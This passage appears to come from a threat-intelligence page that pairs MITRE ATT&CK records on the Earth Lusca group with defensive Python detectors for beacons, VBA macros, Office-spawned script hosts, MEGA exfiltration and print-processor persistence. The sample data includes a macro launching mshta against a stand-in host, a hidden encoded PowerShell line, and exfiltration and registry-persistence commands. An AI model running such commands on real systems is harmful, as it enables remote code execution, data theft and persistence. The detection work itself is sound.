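# SaaS names the business is known to use behind the same CDN (assumed allowlist).
KNOWN_SNI = {"www.example-news.invalid", "api.example-saas.invalid"}


def is_cdn_ip(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_PREFIXES)


def find_cdn_beacons(connections, min_count=8, max_cv=0.15):
    """Return CDN-fronted (src, sni) pairs whose connection timing is beacon-like.

    connections: iterable of (ts, src, dst_ip, sni). Because the CDN edge makes dst_ip
    uninformative, traffic is keyed on the TLS SNI. Regularity is the coefficient of
    variation of the inter-arrival gaps; a low CV means a fixed sleep with light jitter.
    """
    times = defaultdict(list)
    for ts, src, dst_ip, sni in connections:
        if is_cdn_ip(dst_ip) and sni not in KNOWN_SNI:
            times[(src, sni)].append(ts)
    hits = []
    for (src, sni), ts_list in times.items():
        if len(ts_list) < min_count:
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            hits.append({"src": src, "sni": sni, "count": len(ts_list),
                         "mean_gap_s": round(mean, 1), "cv": round(cv, 3)})
    return hits


def _series(start, gaps):
    """Turn a start time and a list of gaps into absolute timestamps."""
    out, t = [start], start
    for g in gaps:
        t += g
        out.append(t)
    return out


# Constructed connection log (not real traffic).
_BEACON_GAPS = [300, 297, 304, 301, 296, 303, 299, 302, 298, 300, 305]   # 5-minute sleep, small jitter
_BROWSE_GAPS = [12, 340, 7, 1200, 55, 3, 880, 21, 400, 9, 2]             # human browsing
SAMPLE_CONNECTIONS = (
    [(t, "10.0.0.15", "104.16.1.2", "update.example-cdn.invalid") for t in _series(1_700_000_000, _BEACON_GAPS)]
    + [(t, "10.0.0.23", "104.16.3.4", "www.example-news.invalid") for t in _series(1_700_000_000, _BEACON_GAPS)]
    + [(t, "10.0.0.42", "172.64.9.9", "cdn-assets.example-shop.invalid") for t in _series(1_700_000_500, _BROWSE_GAPS)]
    + [(t, "10.0.0.15", "198.51.100.5", "intranet.example.invalid") for t in _series(1_700_000_000, [60] * 11)]
)

if __name__ == "__main__":
    for h in find_cdn_beacons(SAMPLE_CONNECTIONS):
        print(h)
```

Two of the constructed series are deliberately not reported: the regular traffic to `www.example-news.invalid` is suppressed by the allowlist (which is exactly where a fronted C2 that reuses a known SaaS name would hide, so treat the allowlist as a tuning knob rather than a safety net), and the regular traffic to `198.51.100.5` is out of scope here because it is not CDN-fronted, although the same periodicity test applies to it.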
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--245ced0a-5a53-44bd-a4db-07451f752b14 revoked : False technique : Visual Basic technique_description : Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1059.005 matrix : mitre-attack platform : ['Windows', 'macOS', 'Linux'] data_sources : ['Module: Module Load', 'Command: Command Execution', 'Process: Process Creation', 'Script: Script Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
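The Visual Basic (T1059.005) record above explains that VBA macros run as event-driven code inside Office documents, which is why static triage of extracted macro source is the usual first step before opening a suspect attachment. The scorer below looks for the auto-execute entry points, the execution and download APIs, and the `Chr()`-and-concatenation string building that macro loaders use to hide those API names. It is an added example written for this page, not code from MITRE, Trend Micro or any macro-analysis tool; it operates on already-extracted VBA text (extraction from the OLE/OOXML container is out of scope), and the keyword lists, weights and both sample macros are the author's constructions.

```python
import re

# Entry points Office runs without a click once macros are enabled, and APIs that turn a
# document into a loader (assumed lists for illustration; extend per environment).
AUTO_EXEC = re.compile(r"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|"
                       r"Workbook_Open|Workbook_Activate|Auto_Open)\b", re.I)
SUSPICIOUS_API = re.compile(
    r"\b(Shell|ShellExecute|CreateObject|GetObject|WScript\.Shell|Environ|URLDownloadToFile|"
    r"XMLHTTP|ADODB\.Stream|Open\s+.*\bFor\s+Binary|Declare\s+(?:PtrSafe\s+)?Function)\b", re.I)
LOLBIN = re.compile(r"\b(mshta|powershell|cmd|regsvr32|rundll32|certutil)(\.exe)?\b", re.I)
DROP_EXT = re.compile(r"\.(exe|dll|hta|vbs|js|ps1|cab|lnk)\b", re.I)
_CHR = re.compile(r"Chr[W$]?\((\d{1,3})\)", re.I)
_WEIGHTS = {"auto-exec entry point": 3, "execution/download API": 2, "LOLBin reference": 2,
            "executable file extension": 1, "string obfuscation (Chr/concatenation)": 2}


def deobfuscate(vba):
    """Fold Chr(n) calls and adjacent "a" & "b" literals into plain string literals."""
    out = _CHR.sub(lambda m: '"' + chr(int(m.group(1))) + '"', vba)
    prev = None
    while prev != out:                     # merge pairs until nothing changes
        prev = out
        out = re.sub(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"', r'"\1\2"', out)
    return out


def score_macro(vba):
    """Return {'score': int, 'indicators': [(category, match), ...]} for one macro module."""
    text = deobfuscate(vba)
    indicators = [("auto-exec entry point", m.group(1)) for m in AUTO_EXEC.finditer(text)]
    indicators += [("execution/download API", m.group(1)) for m in SUSPICIOUS_API.finditer(text)]
    indicators += [("LOLBin reference", m.group(1)) for m in LOLBIN.finditer(text)]
    indicators += [("executable file extension", m.group(0)) for m in DROP_EXT.finditer(text)]
    if text != vba:
        indicators.append(("string obfuscation (Chr/concatenation)", ""))
    return {"score": sum(_WEIGHTS[cat] for cat, _ in indicators), "indicators": indicators}


# Constructed macro sources (not samples from any real document).
SAMPLE_MACRO = '''Sub AutoOpen()
    Dim o As Object
    Set o = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & "Shell")
    o.Run "mshta http://cdn.example.invalid/p.hta", 0
End Sub
'''
BENIGN_MACRO = '''Sub FormatReport()
    ActiveSheet.Range("A1:D20").Font.Bold = True
    ActiveSheet.Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, score_macro(src))
```

After deobfuscation the sample's `CreateObject(Chr(87) & ... & "Shell")` reads `CreateObject("WScript.Shell")`, which is what the API match fires on; a scanner that does not fold the `Chr()` chain first sees only `CreateObject` and misses the shell object and the `mshta` launch that follows it. Keyword scoring is a triage aid, not a verdict: macros that build strings via `StrReverse`, `Replace` or document-property lookups will score low here, so treat a low score on a macro that still has an auto-exec entry point as "needs sandboxing", not "clean".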
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--b71bc667-b3e8-4482-ba74-118049872be4 revoked : False technique : Malicious File technique_description : An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. 
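The two Earth Lusca entries above describe one execution chain: a VBA macro (T1059.005) inside a file the user is lured into opening (T1204.002). On the endpoint that chain is most visible as an Office application spawning a script host or LOLBin. The following is an added example, not code from this page or from the cited reports: it runs that detection over constructed Sysmon-style process-creation events and ties each suspicious child back to the document its Office parent opened. The process-name sets, the macro-capable extensions and the allow-list of benign children are assumptions to tune per environment.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events in Sysmon Event ID 1 style.
# Illustrative only; not telemetry from any Earth Lusca intrusion.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 1180,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" "C:\Users\alice\Downloads\invoice.docm"'},
    {"ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"wscript.exe //B //E:vbscript C:\Users\alice\AppData\Local\Temp\update.vbs"},
    {"ProcessId": 4201, "ParentProcessId": 4150,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ProcessId": 4355, "ParentProcessId": 4120,
     "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ProcessId": 4410, "ParentProcessId": 1180,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe readme.txt"},
]

# Assumed name sets; extend from a baseline of the environment.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
BENIGN_CHILDREN = {"splwow64.exe"}  # print-driver helper that Office spawns routinely
MACRO_EXTENSIONS = {".doc", ".dot", ".docm", ".dotm", ".xls", ".xlt", ".xlsm", ".xltm", ".xlam",
                    ".ppt", ".pptm", ".potm", ".ppam"}
DOCUMENT_EXTENSIONS = MACRO_EXTENSIONS | {".docx", ".dotx", ".xlsx", ".pptx", ".rtf"}


def _name(path):
    return PureWindowsPath(path).name.lower()


def documents_opened(events):
    """Map Office ProcessId -> (document path, macro-capable?) taken from the launch command line."""
    opened = {}
    for e in events:
        if _name(e["Image"]) not in OFFICE_HOSTS:
            continue
        # Walk quoted and unquoted arguments; the first document-looking one is what was opened.
        for m in re.finditer(r'"([^"]+)"|(\S+)', e["CommandLine"]):
            arg = m.group(1) or m.group(2)
            ext = PureWindowsPath(arg).suffix.lower()
            if ext in DOCUMENT_EXTENSIONS:
                opened[e["ProcessId"]] = (arg, ext in MACRO_EXTENSIONS)
    return opened


def office_child_findings(events):
    """Flag Office applications spawning script hosts or LOLBins, tied to the document the parent opened."""
    opened = documents_opened(events)
    findings = []
    for e in events:
        parent, child = _name(e["ParentImage"]), _name(e["Image"])
        if parent not in OFFICE_HOSTS or child in BENIGN_CHILDREN:
            continue
        doc, macro = opened.get(e["ParentProcessId"], (None, None))
        findings.append({
            "pid": e["ProcessId"],
            "parent": parent,
            "child": child,
            "document": doc,            # None when the parent's launch was not in the event set
            "macro_capable": macro,
            "severity": "high" if child in SCRIPT_HOSTS else "medium",
            "command": e["CommandLine"],
        })
    return findings


if __name__ == "__main__":
    for f in office_child_findings(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['parent']} -> {f['child']} (doc={f['document']}) :: {f['command']}")
```

On the sample set the WINWORD-to-wscript event is reported with its macro-capable `invoice.docm`, the EXCEL-to-powershell event is reported without a document because the parent's launch is not in the set, and the splwow64 child is suppressed by the allow-list. Any non-allow-listed child of an Office process is still reported at medium severity, since a loader dropped by a macro need not be a script host at all.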
These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1204.002 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['Process: Process Creation', 'File: File Creation'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a44ba3c3-406a-49cf-9d7b-9ee7f09f9ae4 revoked : False technique : Exfiltration to Cloud Storage technique_description : Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox, Google Drive, and MEGA. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
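Earth Lusca's use of megacmd (above) gives this technique a concrete shape: a command-line client on the host plus a large outbound transfer to the storage provider. The following added example, not code from this page or the cited reports, correlates the two sides over constructed process-creation and flow records. The MEGAcmd binary names, the MEGA service domains and the 100 MiB threshold are assumptions to verify against the vendor's current packages and your own traffic baseline.

```python
from pathlib import PureWindowsPath, PurePosixPath

# Assumed MEGAcmd executable names (Windows and Linux packages) and MEGA service domains.
MEGACMD_BINARIES = {"megacmdshell.exe", "megaclient.exe", "megacmdserver.exe",
                    "mega-cmd", "mega-cmd-server", "mega-login", "mega-put", "mega-get"}
MEGA_DOMAINS = ("mega.nz", "mega.co.nz", "mega.io")
UPLOAD_THRESHOLD = 100 * 1024 * 1024  # 100 MiB per host; assumed, tune per environment

# Constructed sample telemetry: process creations and per-host outbound flow summaries.
SAMPLE_PROCESSES = [
    {"host": "WS-17", "user": "svc_backup", "Image": r"C:\Users\Public\MEGAcmd\MEGAclient.exe",
     "CommandLine": r"MEGAclient.exe login user@example.net"},
    {"host": "WS-17", "user": "svc_backup", "Image": r"C:\Users\Public\MEGAcmd\MEGAclient.exe",
     "CommandLine": r"MEGAclient.exe put C:\Users\Public\arc\finance.7z /exfil"},
    {"host": "SRV-DB1", "user": "root", "Image": "/usr/bin/mega-put",
     "CommandLine": "mega-put /var/backups/db.tar.gz /exfil"},
    {"host": "WS-03", "user": "bob", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]
SAMPLE_FLOWS = [
    {"host": "WS-17", "dst": "g.api.mega.co.nz", "bytes_out": 734_003_200},
    {"host": "WS-17", "dst": "gfs262n123.userstorage.mega.co.nz", "bytes_out": 1_900_000_000},
    {"host": "WS-03", "dst": "mega.nz", "bytes_out": 12_000},
    {"host": "WS-03", "dst": "update.example.com", "bytes_out": 5_000_000},
]


def _basename(image):
    # Windows and POSIX image paths can both appear in one event stream.
    cls = PureWindowsPath if "\\" in image else PurePosixPath
    return cls(image).name.lower()


def is_mega_domain(host):
    """Exact or subdomain match only; 'notmega.nz' must not count."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in MEGA_DOMAINS)


def megacmd_executions(events):
    """Process events that ran a MEGAcmd binary, with uploads separated from logins and other verbs."""
    hits = []
    for e in events:
        exe = _basename(e["Image"])
        if exe not in MEGACMD_BINARIES:
            continue
        tokens = e["CommandLine"].split()
        # Linux packages ship one binary per verb (mega-put); the Windows client takes the verb as argv[1].
        if exe.startswith("mega-"):
            verb = exe[len("mega-"):]
        else:
            verb = tokens[1].lower() if len(tokens) > 1 else ""
        hits.append({"host": e["host"], "user": e["user"], "binary": exe,
                     "verb": verb, "upload": verb == "put"})
    return hits


def mega_upload_volume(flows, threshold=UPLOAD_THRESHOLD):
    """Bytes sent to MEGA per host; only hosts at or above the threshold are returned."""
    totals = {}
    for f in flows:
        if is_mega_domain(f["dst"]):
            totals[f["host"]] = totals.get(f["host"], 0) + f["bytes_out"]
    return {h: b for h, b in totals.items() if b >= threshold}


def correlate(events, flows):
    """Hosts where a MEGAcmd upload ran and the network side shows a large transfer to MEGA."""
    uploaders = {h["host"] for h in megacmd_executions(events) if h["upload"]}
    return sorted(uploaders & set(mega_upload_volume(flows)))


if __name__ == "__main__":
    print("megacmd executions:", megacmd_executions(SAMPLE_PROCESSES))
    print("large MEGA uploads:", mega_upload_volume(SAMPLE_FLOWS))
    print("corroborated hosts:", correlate(SAMPLE_PROCESSES, SAMPLE_FLOWS))
```

Either signal alone is worth a look: the Linux host here runs `mega-put` with no flow record at all (flows are often summarised per egress point rather than per host), and a host with only the volume signal may be using the browser client, which the process rule never sees. The correlation is what lets the two be prioritised.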
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='exfiltration')] technique_id : T1567.002 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'File: File Access', 'Command: Command Execution'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--495db551-b69c-482e-b242-831011c054f7 revoked : False technique : Exploitation of Remote Services technique_description : Adversaries may exploit remote services to gain unauthorized access to internal systems once inside a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')] technique_id : T1210 matrix : mitre-attack platform : ['Linux', 'Windows', 'macOS'] data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content'] permissions_required : ['User'] ---------------------------------------------------------------------------------------------------- technique_ref : attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry value `"HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint" /v Driver /d "spool.dll" /f` (the `/v`, `/d` and `/f` switches are those of `reg add`) to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6a779cbf-ef5c-4018-a91f-10889b2068b0 revoked : False technique : Print Processors technique_description : Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors) Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the `HKLM\SYSTEM\[CurrentControlSet or ControlSet001]\Control\Print\Environments\[Windows architecture, e.g. Windows x64]\Print Processors\[user defined]\Driver` Registry value that points to the DLL.
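The registry path in the description above is the detection surface for the Earth Lusca entry: a `Driver` value under `Print Processors` that names a DLL other than the inbox `winprint.dll`. The following added example, not code from this page or the cited reports, normalises both a `reg add` command line and a Sysmon-style registry value-set event into the same (value path, DLL) pair and classifies it. The `reg add` prefix and quoting on the Earth Lusca command, the winprint baseline and the x64 spool directory are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Any control set, any environment, any processor name: only the shape of the path is fixed.
PRINT_PROCESSOR_VALUE = re.compile(
    r"^(?:HKLM|HKEY_LOCAL_MACHINE)\\SYSTEM\\(?P<set>CurrentControlSet|ControlSet\d{3})"
    r"\\Control\\Print\\Environments\\(?P<env>[^\\]+)\\Print Processors\\(?P<name>[^\\]+)\\Driver$",
    re.IGNORECASE)

# reg[.exe] add "<key>" /v <value> [/t <type>] /d "<data>" [/f]
REG_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?P<key>HK[^"]+?)"?\s+/v\s+"?(?P<value>[^"\s]+)"?\s+'
    r'(?:/t\s+\S+\s+)?/d\s+"?(?P<data>[^"]+?)"?\s*(?:/f\s*)?$', re.IGNORECASE)

# Assumed baseline: the inbox print processor is winprint, backed by winprint.dll.
KNOWN_GOOD = {"winprint": {"winprint.dll"}}
# Where spoolsv.exe loads x64 print processors from (assumed standard install path).
PROCESSOR_DIR = {"windows x64": r"C:\Windows\System32\spool\prtprocs\x64"}

SAMPLE_EVENTS = [
    # Reconstructed from the key quoted on this page; the reg add prefix and quoting are assumed.
    {"kind": "command", "host": "SRV-FILE2",
     "CommandLine": r'reg add "HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint" /v Driver /d "spool.dll" /f'},
    # Sysmon Event ID 13 style registry value-set events (constructed).
    {"kind": "registry", "host": "WS-09",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\winprint\Driver",
     "Details": "winprint.dll"},
    {"kind": "registry", "host": "SRV-FILE2",
     "TargetObject": r"HKLM\System\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint\Driver",
     "Details": "spool.dll"},
    # Unrelated reg add, must be ignored.
    {"kind": "command", "host": "WS-09",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Contoso\Agent" /v Level /t REG_DWORD /d 2 /f'},
]


def parse_reg_add(cmdline):
    """Return (value path, data) for a reg add command line, or None if it is not one."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    return m["key"].rstrip("\\") + "\\" + m["value"], m["data"]


def assess_print_processor(value_path, data, host):
    """Classify a write to a Print Processors\\<name>\\Driver value; None if the path is unrelated."""
    m = PRINT_PROCESSOR_VALUE.match(value_path)
    if not m:
        return None
    name, dll = m["name"], PureWindowsPath(data).name.lower()
    known = dll in KNOWN_GOOD.get(name.lower(), set())
    return {
        "host": host,
        "control_set": m["set"],
        "environment": m["env"],
        "processor": name,
        "dll": dll,
        # The DLL must sit in the print-processor directory to load; this is where to go collect it.
        "expected_path": PROCESSOR_DIR.get(m["env"].lower(), "?") + "\\" + dll,
        "verdict": "known-good" if known else "suspicious",
    }


def scan(events):
    """Normalise command-line and registry events to (path, data) and assess each."""
    findings = []
    for e in events:
        if e["kind"] == "command":
            parsed = parse_reg_add(e["CommandLine"])
            if not parsed:
                continue
            path, data = parsed
        else:
            path, data = e["TargetObject"], e["Details"]
        finding = assess_print_processor(path, data, e["host"])
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['verdict']:<10} {f['host']} {f['control_set']} {f['processor']} -> {f['expected_path']}")
```

Writes to `ControlSet001` rather than `CurrentControlSet` are matched on purpose: the symbolic link resolves to whichever numbered set is current, so an adversary writing the numbered key directly (as in the Earth Lusca command) lands in the same place while evading a rule that only watches the `CurrentControlSet` spelling.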
